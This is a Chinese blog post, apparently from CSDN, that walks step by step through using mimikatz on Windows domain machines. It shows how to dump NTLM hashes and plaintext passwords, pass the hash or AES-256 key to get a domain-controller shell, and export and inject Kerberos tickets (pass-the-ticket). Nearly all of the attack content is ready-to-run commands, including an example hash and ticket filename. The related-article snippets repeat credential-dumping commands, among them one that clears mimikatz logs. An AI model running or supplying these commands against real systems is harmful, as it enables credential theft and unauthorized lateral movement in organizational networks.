mimikatz使用哈希 ntlm传递 票据传递

最新推荐文章于 2024-05-16 16:36:26 发布
最新推荐文章于 2024-05-16 16:36:26 发布
阅读量1.9k 收藏 5
点赞数 1
分类专栏: 内网渗透 工具 文章标签: 哈希算法 算法 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121965408
版权

(1)管理员运行

(2)必须输入

privilege::debug

在这里插入图片描述
(3)在目标主机使用mimikatz获取ntlm hash
winserver 2012R2 之前版本 可以获取到明文密码

sekurlsa::logonpasswords
在这里插入图片描述
(4) 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6d043

mimikatz执行后 会弹出一个拥有对应 hash用户权限的 cmd窗口
可看到 弹出 域控的 cmd权限
在这里插入图片描述
(5) aes-256密钥

使用 mimikatz抓取密钥

sekurlsa::ekeys

在这里插入图片描述

获取到 aes-25后

sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /aes256:“aes256的值”

需要目标机器上安装 KB2871997补丁 安装了 该补丁后 ,就可以通过AES256密钥 进行哈希传递啦。

票据传递

privilege::debug
sekurlsa::tickets /export

执行该命令后 会在当前目录生成多个服务的票据文件 例如 kirbi等

在这里插入图片描述

使用以下命令 清楚 内存中的票据

kerberos::purge

将票据文件注入内存

kerberos::ptt “[0;4beae]-2-0-40e00000-Administrator@krbtgt-YXY.YOUTHBELIEF.COM.kirbi”

“文件名”

在当前终端 退出 mimikatz 然后就可以列出目标目录啦。

除了mimikatz工具 还可以用 kekeo传递票据。

LuckyCharm~
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
内网横向移动|PTT票据传递横向|Mimikatz Kerberos
qq_60115503的博客
04-25 3194
票据传递攻击(Pass the Ticket,PtT) 票据传递攻击(PtT)是基于Kerberos认证的一种攻击方法,常用来做后渗透权限维持,黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或者AES-256的值,白银票据攻击利用的前提是得到了域内服务账号的NTLM哈希或者AES-256的值,票据传递攻击用来做域控权限维持 什么是Krbtgt用户 每个域控制器都有一个krbtgt的用户账户,是KDC的服务的账户,用来创建票据授予服务(TGS)加密的密钥kerber...
[内网渗透]—票据传递
Sentiment的博客
12-08 751
之前我们在哈希传递篇就介绍到,要想使用mimikatz哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的域账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。
域渗透之明文传递&hash传递
最新发布
qq_55202378的博客
05-16 383
在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里提供一条思路:在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。mimikaze抓取windows用户名、密码。建立IPC常见的错误代码。
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6575
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
使用mimikatz利用哈希传递获取域控权限
qq_54713392的博客
06-29 991
使用mimikatz利用哈希传递获取域控权限 靶机 window server 2012 IP 192.168.1.22 攻击机 window7 IP 192.168.1.34 (1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用mimikatz或者pwdump7 使用pwdump7,执行命令Pwdump7.exe 导出信息到1.txt中 复制出ntlm CE28B42F9943D0552385BC5F6338F9B9 (2)在
内网安全之:Windows 密码抓取
f_carey的博客
11-14 4018
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 密码抓取 1 mimikatz 抓取密码 注:在 Windows 系统中抓取 NTLM Hash 值或明文密码,必须将权限提升到 System;lsass.exe 进程用于实现 Windows 的安全策略。 利用通过 SAM 和 System 文件获得 NTLM Hash gentilkiw.
【渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】
AA8j的博客
11-15 3424
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash传递攻击 首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段
mimikatz 2.1
10-27
1. **密码提取**:mimikatz可以提取当前会话中的明文密码、NTLM哈希、Kerberos票据等,这对于理解系统的安全性极为有用。例如,`sekurlsa::logonpasswords`命令可以获取用户登录密码。 2. **LSA秘密**:mimikatz...
mimikatz-trunk(2.2.0 20190512 Windows 10 1903).zip
01-06
通过阅读此文件,用户可以快速上手,了解如何在Windows 10 1903环境中运行mimikatz,以及如何利用它来获取系统的敏感信息,例如NTLM哈希、Kerberos票据或者本地和域用户的明文密码。 “kiwi_passwords.yar”是...
mimikatz VC源码
09-23
mimikatz的源码中,我们可以看到诸如lsadump、sekurlsa、mimilib等模块,它们分别对应不同的功能,例如lsadump用于获取NTLM哈希,sekurlsa处理Kerberos和NTLM身份验证等。这些模块都是用C语言编写,遵循清晰的编程...
mimikatz-2.2.0-20220919.zip
01-06
mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于Windows系统中的权限提升、密码提取、 Kerberos票据管理等网络安全研究。这个压缩包“mimikatz-2.2.0-20220919.zip”包含了最新版本的...
内网横向常用手法
weixin_56606020的博客
08-24 1881
内网横向手法
内网横向移动|哈希传递PTH|mimikatz使用
qq_60115503的博客
04-25 5045
Mimikatz是法国人benjamin开发的一款强大的轻量级调式工具,本意是用来个人测试,但由于其功能强大,能够直接读取Windows-XP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1937
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
NTLM||LM算法&&lsass&&winlogon进程
huohaowen的博客
02-10 1094
抓不到你win11的密码我和你姓
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
weixin_45715461的博客
06-05 1393
哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
黄金票据制作原理及利用方式
Happy峰
09-23 2679
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
mimikatz hash传递--获取域控权限
qq_46635165的博客
10-18 1906
mimikatz hash传递–获取域控权限 实验环境 实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码) win_server2008 ip:192.168.3.133 (DC域控,与server2012管理员密码相同,但不知明文密码) 此时,你已经拿下了域内一普通用户win_server2012 实验步骤 1,将mimikatz上传至win_server2012; 2,cd 至mimikatz目录; 3,使用reg命令,将注册表
kali 中mimikatz使用教程
06-28
### 回答1: 这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到违法行为,请使用时慎重考虑。 ### 回答2: Mimikatz是一款用于提取Windows凭证的工具,它可以用来获取本地Windows用户和域用户的密码、NTLM哈希值和明文密码。本文将介绍如何通过Kali中的Mimikatz工具来实现提取凭证的操作。 1. 安装Mimikatz Mimikatz是Kali自带的工具,在终端中输入以下命令即可安装: ``` apt-get install mimikatz ``` 2. 运行Mimikatz 进入终端,输入以下命令来运行Mimikatz: ``` mimikatz ``` 如果你使用的是64位版本的系统,你还需要输入以下命令: ``` mimikatz # privilege::debug ``` 这个命令会给你的用户添加更多的访问权限,也就是所谓的debug权限。 3. 提取凭证 接下来,你可以通过以下命令来提取凭证: ``` mimikatz # sekurlsa::logonpasswords ``` 这个命令会输出本地计算机上所有用户的明文密码和NTLM哈希值。 如果你想获取域用户的凭证,可以使用以下命令: ``` mimikatz # sekurlsa::logonpasswords full ``` 这个命令会输出域控制器上所有域用户的明文密码和NTLM哈希值。 4. 清除日志和关闭Mimikatz 运行Mimikatz时默认会生成一些日志文件。如果你不希望这些日志留在计算机上,可以使用以下命令来清除日志: ``` mimikatz # log::clear ``` 最后,输入以下命令来关闭Mimikatz: ``` mimikatz # exit ``` 以上就是通过Kali中的Mimikatz工具来实现提取凭证的操作的详细教程。需要注意的是,Mimikatz是一款非常强大的工具,使用时请谨慎,避免造成不必要的损失。 ### 回答3: Kali是一个开源免费的渗透测试操作系统,而mimikatz是一个密码破解工具,常被黑客用于窃取用户密码,因此Kali与mimikatz结合使用可以进行密码破解和渗透测试。 首先,在Kali中下载安装mimikatz。打开终端,输入以下命令: git clone https://github.com/gentilkiwi/mimikatz.git 然后,进入mimikatz文件夹,编译mimikatz工具: cd mimikatz make 编译完成后,输入以下命令即可使用mimikatz: ./mimikatz 接下来,使用privilege模块提升权限: privilege::debug 然后,使用sekurlsa模块获取系统的登录凭据: sekurlsa::logonpasswords 最后,我们可以通过导出文件的方式保存密码信息,输入以下命令: sekurlsa::logonpasswords full log sekurlsa.log 这样就完成了在Kali中使用mimikatz的教程。需要注意的是,这种密码破解和窃取方法是非法的,只能在授权的渗透测试环境中使用。在实际的工作中,我们要始终遵循合法合规的原则,做好安全防护和风险评估工作,确保系统和数据的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值